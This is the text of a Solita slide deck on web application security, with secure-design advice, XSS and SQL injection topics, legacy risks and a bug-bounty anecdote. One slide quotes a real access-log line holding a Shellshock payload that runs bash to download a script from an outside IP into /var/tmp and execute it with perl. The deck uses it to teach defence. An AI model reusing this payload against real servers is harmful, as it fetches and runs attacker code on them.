Date post: | 22-Jan-2018 |
Category: |
Engineering |
Upload: | solita-oy |
View: | 425 times |
Download: | 0 times |
AGENDA
› How to make secure software?
› … But, everything is broken!
› … Because ...• Same mistakes are repeated.• Unthinkable, Unpossible, Impossiblator happens
› Practical web application security testing.
› Bonus: 10. fail 20. goto 10
”“If you know the enemy and know
yourself, you need not fear the result of a hundred battles. ”
Sun Tzu, Art of War
Source: Hackerman, Kung Fury movie
Source: NSA recruitment video.
Source: securityintelligence.com
Source: Lizard Squad hacking group logo
RECIPE FOR SECURE SOFTWARE
1. Design it properly. Do the right thing.
2. Do it right1. Mistake in implementation = bug = security issue
3. Prepare for the unthinkable
(Bug bounties etc. are useful too, but out of scope here.)
DO THE RIGHT THING
1. Don’t roll your own.1. Especially, don’t invent hash algorithms, RND or crypto!2. Seriously. Failure imminent and certain.
2. Follow best practices.
3. Understand what you are doing.1. Read the RFC. Understand your tools and libs.
THE SAME STORY ALL OVER!
› XSS, CSRF, SQL injection, XXE..• Are all about input validation.
› Solution: white list allowed, deny everything else.
› There’s still 20% left• You can fail session management certainly, but..• Follow the advice: Don’t invent your own and you’ll be pretty safe.
The most satisfying feeling you can get in the job is... The Pwn. Let's say you find SQL injection. Blood is rushing into your brain and that's what we call The Pwn. Your brain gets a really tight feeling, like your head is going to explode any minute,.
Arnold “Iceman” Schwarzenegger, movie Pwning iron.
LET’S XSS !
› Reflected vs. Stored
› <script> doesn’t work? • No problem, JS is everywhere..
› Can’t XMLHttpRequest? • No prob, counter and fake
SQL INJECTION
› GRUYERE does not contain SQL injection..
› But .. It’s a good example of an injection
› SQL = Structured Query Language• However, “query” is a bit of a misnomer..
What is this???
FROM A REAL ACCESS LOG(CUSTOMER IP REDACTED)
› 2015-02-09:2015-02-09 09:17:01,420 INFO xxxx.infra.print-wrapper: Request 387280 start. host: xxx.xxx.xxx.xxx ,remote-addr: xx.xxx.xx.xxx ,method: GET ,uri: /cgi-bin/adm.cgi ,query-string: ,user-agent: () { :;}; /bin/bash -c "cd /var/tmp;wgethttp://151.236.44.210/efixx;curl -O http://151.236.44.210/efixx;perlefixx;perl /var/tmp/efixx;perl efixx" ,referer: ,oid:
Google tip: Shellshock
DEV OR OPS? OR #DEVSEC ?
› Who is responsible for that server?
› Do you need to care as a developer?
› Ultimately: What is the developer’s responsibility?
FAIL 1: THE BURDEN OF LEGACYMD5 & C++ - “ELEGANT WEAPONS .. FOR A MORE CIVILIZED AGE”
› Native code is dangerous..• ASLR & DEP make buffer overflows more difficult to exploit, but it still
happens.
› The lifespan of software can be surprisingly long..• How to update and re-evaluate working software if nothing happens?• Home-exercise: Sell this to team & customer. Involves risk and cost.
› New threats have emerged.• What parts are affected?
Screeshot removed..
FAIL 2: SHORTCUTS AND ANARCHY
› Root cause: Heavy process, not understood / accepted by devs• making developers miserable..
› The devs are innovative people..
http//unauthorized..V 1.3 coolserver
AwesomeSoftware_Upgrade.exe
STORY 4: THE WEBHACK EVENT
› http://webhack.fi was a light-weight fun bug bounty hunt..• The targets are not publicly accessible, but were production systems we
created for our customers.
› Hackers hacked..
› .. SQL injection -> dumped the whole database
› .. But our code was fine! WAT?
ONE DOES NOT SIMPLY INJECT INTO..› One issue turned out to be a 0-day in Spring libraries..
› Hnggh..
› The moral of the story is two-fold: 1. even if you do everything right, you can still fail2. it’s not always so easy in real life..
› The gory details: https://github.com/solita/sqli-poc
FURTHER MATERIAL• From the internet:
• OWASP Top 10• https://www.owasp.o
rg/index.php/Category:OWASP_Top_Ten_Project
• OWASP ZAP proxy• https://www.owasp.o
rg/index.php/OWASP_Zed_Attack_Proxy_Project
• Kali Linux• https://www.kali.org
/